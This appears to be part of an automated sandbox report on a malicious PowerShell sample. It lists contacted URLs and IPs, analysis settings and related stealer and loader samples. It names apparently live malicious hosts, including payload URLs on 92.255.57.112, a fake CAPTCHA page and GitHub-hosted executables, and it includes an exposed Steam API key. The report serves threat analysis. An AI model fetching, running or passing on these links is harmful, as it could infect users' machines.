                                                                                                            https://contoso.com/Iconpowershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                              high
                                                                                                              http://crl.ver)svchost.exe, 00000004.00000002.3291805384.000001A4C5000000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                high
                                                                                                                https://community.fastly.steamstatic.com/public/css/applications/community/main.css?v=I8QM230l1pb_&aRegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                  high
                                                                                                                  http://92.255.57.112/1/2.pngXpowershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                  • Avira URL Cloud: safe
                                                                                                                  unknown
                                                                                                                  https://sketchfab.comRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                    high
                                                                                                                    https://lv.queniujq.cnRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                      high
                                                                                                                      https://www.youtube.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                        high
                                                                                                                        https://github.com/Pester/Pesterpowershell.exe, 00000008.00000002.2132331427.000001D0818C6000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                          high
                                                                                                                          http://go.micRegSvcs.exe, 0000000B.00000002.2124142825.0000000001458000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            high
                                                                                                                            https://view-reserve.com/recaptcha-verify.htmlXmshta.exe, 00000003.00000003.2105666148.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2101288585.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106417373.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D449000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D449000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                            • Avira URL Cloud: safe
                                                                                                                            unknown
                                                                                                                            http://www.protware.commshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2102151892.0000020E2D3B7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              high
                                                                                                                              https://view-reserve.com/recaptcha-verify.htmlUmshta.exe, 00000003.00000002.2136717878.000002062A9E9000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                              • Avira URL Cloud: safe
                                                                                                                              unknown
                                                                                                                              https://community.fastly.steamstatic.com/public/javascript/applications/community/main.js?v=dK492ur3RegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                high
                                                                                                                                https://stackoverflow.com/q/2152978/23354rCannotRegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                  high
                                                                                                                                  https://www.google.com/recaptcha/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                    high
                                                                                                                                    https://checkout.steampowered.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      high
                                                                                                                                      https://view-reserve.com/recaptcha-verify.htmlINetCookiesmshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      http://92.255.57.112powershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D80227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080227000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmptrue
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://view-reserve.com/recaptcha-verify.htmleSmshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                      • Avira URL Cloud: safe
                                                                                                                                      unknown
                                                                                                                                      https://store.steampowered.com/;RegSvcs.exe, 0000000D.00000002.2153761108.00000000011B6000.00000004.00000020.00020000.00000000.sdmp, RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        high
                                                                                                                                        https://view-reserve.com/recaptcha-verify.html8mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        http://92.255.H2powershell.exe, 00000005.00000002.2129677364.0000024B81662000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                        unknown
                                                                                                                                        https://github.com/DFfe9ewf/test3/raw/refs/heads/main/msedgedriver.exeRegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                          high
                                                                                                                                          https://contoso.com/Licensepowershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                            high
                                                                                                                                            https://view-reserve.com/recaptcha-verify.html...mshta.exe, 00000003.00000002.2152048754.0000020E2CC92000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                            • Avira URL Cloud: malware
                                                                                                                                            unknown
                                                                                                                                            https://aka.ms/pscore6powershell.exe, 00000000.00000002.2060609253.000002793F5CF000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                              high
                                                                                                                                              https://steamcommunity.com/linkfilter/?u=http%3A%2F%2Fwww.geonames.orgRegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                high
                                                                                                                                                https://recaptcha.net/recaptcha/;RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  high
                                                                                                                                                  https://view-reserve.com/recaptcha-verify.htmldJmshta.exe, 00000003.00000002.2153759540.0000020E2CF10000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://92.255.Hpowershell.exe, 00000007.00000002.2134150506.0000022D81662000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                  unknown
                                                                                                                                                  http://www.protware.com/mshta.exe, 00000003.00000003.2106417373.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2096936838.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106547656.0000020E2D439000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105666148.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2079685811.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2106126871.0000020E2CCD3000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2154237508.0000020E2D43D000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088287641.0000020E2D431000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080802003.0000020E2CCD0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2152346497.0000020E2CCD4000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    high
                                                                                                                                                    https://view-reserve.com/recaptcha-verify.htmlC:mshta.exe, 00000003.00000003.2096831350.000002062AAB0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2136717878.000002062A9D0000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2085261392.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA96000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137977166.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2074933284.000002062AAA7000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2105489121.000002062AAB1000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2088207114.000002062AAA3000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://view-reserve.com/mshta.exe, 00000003.00000003.2085261392.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000002.2137137562.000002062AA44000.00000004.00000020.00020000.00000000.sdmp, mshta.exe, 00000003.00000003.2080596666.000002062AA44000.00000004.00000020.00020000.00000000.sdmptrue
                                                                                                                                                    • Avira URL Cloud: safe
                                                                                                                                                    unknown
                                                                                                                                                    https://medal.tvRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                      high
                                                                                                                                                      https://broadcast.st.dl.eccdnx.comRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                        high
                                                                                                                                                        https://stackoverflow.com/q/11564914/23354;RegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                          high
                                                                                                                                                          https://contoso.com/powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                            high
                                                                                                                                                            https://oneget.orgXpowershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                              high
                                                                                                                                                              https://login.steampowered.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                high
                                                                                                                                                                https://store.steampowered.com/;Persistent-AuthWWW-AuthenticateVarysteamCountry=US%7C185ce35c568ebbbRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                  high
                                                                                                                                                                  http://92.255.57.112/1/1.pngXpowershell.exe, 00000005.00000002.2129677364.0000024B80EA9000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  https://view-reserve.com/recaptcha-verify.htmlhttps://view-reserve.com/recaptcha-verify.htmlmshta.exe, 00000003.00000003.2097676404.0000020E2CE95000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                  • Avira URL Cloud: safe
                                                                                                                                                                  unknown
                                                                                                                                                                  http://nuget.org/NuGet.exepowershell.exe, 00000005.00000002.2280800865.0000024B90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.2129677364.0000024B8191F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2333849561.0000022D90073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D81923000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2321823186.000001D090073000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081921000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                    high
                                                                                                                                                                    http://www.apache.org/licenses/LICENSE-2.0powershell.exe, 00000005.00000002.2129677364.0000024B8168F000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.2134150506.0000022D8166A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.2132331427.000001D081669000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                      high
                                                                                                                                                                      https://github.com/DFfe9ewf/test3/raw/refs/heads/main/WebDriver.dllRegSvcs.exe, 0000000C.00000002.3294615870.0000000002B1E000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        high
                                                                                                                                                                        http://92.255.57.112/1/3.pngXpowershell.exe, 00000008.00000002.2132331427.000001D080EB5000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        http://92.255.Hrpowershell.exe, 00000008.00000002.2132331427.000001D081661000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                                                                                        • Avira URL Cloud: safe
                                                                                                                                                                        unknown
                                                                                                                                                                        https://recaptcha.netRegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                          high
                                                                                                                                                                          https://store.steampowered.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                            high
                                                                                                                                                                            https://steamcommunity.comRegSvcs.exe, 0000000D.00000002.2151633719.0000000001151000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                              high
                                                                                                                                                                              http://127.0.0.1:27060RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                high
                                                                                                                                                                                https://steamcommunity.com/profiles/76561199724331900RRegSvcs.exe, 0000000D.00000002.2151633719.000000000116A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                  high
                                                                                                                                                                                  https://g.live.com/odclientsettings/Prod/C:edb.log.4.drfalse
                                                                                                                                                                                    high
                                                                                                                                                                                    https://help.steampowered.com/RegSvcs.exe, 0000000D.00000002.2152709553.00000000011A7000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                                                                                                                      high
                                                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                                                      • 75% < No. of IPs
                                                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                                                      92.255.57.120
                                                                                                                                                                                      view-reserve.comRussian Federation
                                                                                                                                                                                      42253TELSPRUtrue
                                                                                                                                                                                      92.255.57.112
                                                                                                                                                                                      unknownRussian Federation
                                                                                                                                                                                      42253TELSPRUtrue
                                                                                                                                                                                      104.102.49.254
                                                                                                                                                                                      steamcommunity.comUnited States
                                                                                                                                                                                      16625AKAMAI-ASUSfalse
                                                                                                                                                                                      IP
                                                                                                                                                                                      127.0.0.1
                                                                                                                                                                                      Joe Sandbox version:42.0.0 Malachite
                                                                                                                                                                                      Analysis ID:1591695
                                                                                                                                                                                      Start date and time:2025-01-15 10:08:10 +01:00
                                                                                                                                                                                      Joe Sandbox product:CloudBasic
                                                                                                                                                                                      Overall analysis duration:0h 7m 23s
                                                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                                                      Report type:full
                                                                                                                                                                                      Cookbook file name:default.jbs
                                                                                                                                                                                      Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                                                                                                      Number of analysed new started processes analysed:16
                                                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                                                      Technologies:
                                                                                                                                                                                      • HCA enabled
                                                                                                                                                                                      • EGA enabled
                                                                                                                                                                                      • AMSI enabled
                                                                                                                                                                                      Analysis Mode:default
                                                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                                                      Sample name:00.ps1
                                                                                                                                                                                      Detection:MAL
                                                                                                                                                                                      Classification:mal100.troj.spyw.evad.winPS1@20/19@13/4
                                                                                                                                                                                      EGA Information:
                                                                                                                                                                                      • Successful, ratio: 37.5%
                                                                                                                                                                                      HCA Information:
                                                                                                                                                                                      • Successful, ratio: 83%
                                                                                                                                                                                      • Number of executed functions: 126
                                                                                                                                                                                      • Number of non-executed functions: 13
                                                                                                                                                                                      Cookbook Comments:
                                                                                                                                                                                      • Found application associated with file extension: .ps1
                                                                                                                                                                                      • Exclude process from analysis (whitelisted): dllhost.exe, WMIADAP.exe, SIHClient.exe
                                                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 2.23.242.162, 199.232.210.172, 4.175.87.197, 13.107.246.45, 20.3.187.198, 4.245.163.56, 172.202.163.200
                                                                                                                                                                                      • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com.delivery.microsoft.com, e16604.g.akamaiedge.net, ctldl.windowsupdate.com, prod.fs.microsoft.com.akadns.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, wu-b-net.trafficmanager.net, fe3cr.delivery.mp.microsoft.com
                                                                                                                                                                                      • Execution Graph export aborted for target RegSvcs.exe, PID 7296 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target mshta.exe, PID 6488 because there are no executed function
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 1644 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 6528 because it is empty
                                                                                                                                                                                      • Execution Graph export aborted for target powershell.exe, PID 744 because it is empty
                                                                                                                                                                                      • Not all processes where analyzed, report is missing behavior information
                                                                                                                                                                                      • Report size exceeded maximum capacity and may have missing behavior information.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenFile calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                                                                                                      • Report size getting too big, too many NtReadVirtualMemory calls found.
                                                                                                                                                                                      • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                                                                                                      TimeTypeDescription
                                                                                                                                                                                      04:09:05API Interceptor2x Sleep call for process: svchost.exe modified
                                                                                                                                                                                      04:09:05API Interceptor2x Sleep call for process: mshta.exe modified
                                                                                                                                                                                      04:09:07API Interceptor70x Sleep call for process: powershell.exe modified
                                                                                                                                                                                      04:09:11API Interceptor2422317x Sleep call for process: RegSvcs.exe modified
                                                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                      92.255.57.11292.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                        92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                          92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                            book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              104.102.49.254r4xiHKy8aM.exeGet hashmaliciousSocks5SystemzBrowse
                                                                                                                                                                                              • /ISteamUser/GetFriendList/v1/?key=AE2AE4DBF33A541E83BC08989DB1F397&steamid=76561198400860497
                                                                                                                                                                                              http://gtm-cn-j4g3qqvf603.steamproxy1.com/Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • www.valvesoftware.com/legal.htm
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              bg.microsoft.map.fastly.net31070304561863532281.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              new.batGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              2387315401298627745.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              1475127682155276.jsGet hashmaliciousStrela DownloaderBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              Invdoc80.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              Reversed order 24-25.pdfGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              wmnq39xe8J.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                                                              • 199.232.214.172
                                                                                                                                                                                              Final-Agreement-Document#808977735.pdfGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 199.232.210.172
                                                                                                                                                                                              steamcommunity.com92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              lumma1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              random.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              yTRd6nkLWV.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              XhlpAnBmIk.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              k7h8uufe6Y.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              G7T8lHJWWM.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              92.255.57_2.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              TELSPRU92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              92.255.57.155.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              AKAMAI-ASUS92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              mips.elfGet hashmaliciousMiraiBrowse
                                                                                                                                                                                              • 23.54.60.125
                                                                                                                                                                                              EXTERNAL Your company's credit limit has changed!.msgGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 184.28.89.29
                                                                                                                                                                                              https://sreamconmymnltty.com/scerty/bliun/bolopGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              https://www.giselabravo.com/lblogin/loginsGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.53.18
                                                                                                                                                                                              Eastern Contractors Corporation Contract and submittal document.emlGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 2.19.126.97
                                                                                                                                                                                              download.exeGet hashmaliciousBabuk, MimikatzBrowse
                                                                                                                                                                                              • 173.222.162.32
                                                                                                                                                                                              mlfk8sYaiy.dllGet hashmaliciousWannacryBrowse
                                                                                                                                                                                              • 172.230.50.2
                                                                                                                                                                                              XML-702.msiGet hashmaliciousAteraAgentBrowse
                                                                                                                                                                                              • 2.23.77.188
                                                                                                                                                                                              EFT_Payment_Notification_Gheenirrigation.htmlGet hashmaliciousHTMLPhisherBrowse
                                                                                                                                                                                              • 2.19.126.89
                                                                                                                                                                                              TELSPRU92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              92.255.57.112.ps1Get hashmaliciousPureCrypterBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              WZ6RvDzQeq.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              2.ps1Get hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              92.255.57_1.112.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              book_lumm2.dat.exeGet hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.112
                                                                                                                                                                                              http://92.255.57.155/1/1.pngGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              92.255.57.155.ps1Get hashmaliciousXWormBrowse
                                                                                                                                                                                              • 92.255.57.155
                                                                                                                                                                                              MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              92.255.57_1.112.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              62.122.184.98 (3).ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              87.247.158.212.ps1Get hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              lumma_phothockey.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              mWAik6b.exeGet hashmaliciousLummaC, PureLog StealerBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              lumma1.exeGet hashmaliciousLummaCBrowse
                                                                                                                                                                                              • 104.102.49.254
                                                                                                                                                                                              37f463bf4616ecd445d4a1937da06e19Inquiry.jsGet hashmaliciousPXRECVOWEIWOEI StealerBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              138745635-72645747.116.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              2834573-3676874985.02.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              regsvr.exeGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              0dsIoO7xjt.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              inward_payment_confirmation_reference_Z1766053541_notifications.bat.exeGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              1KaTo6P18Z.docGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
                                                                                                                                                                                              5UnAIdF7m2.docxGet hashmaliciousUnknownBrowse
                                                                                                                                                                                              • 92.255.57.120
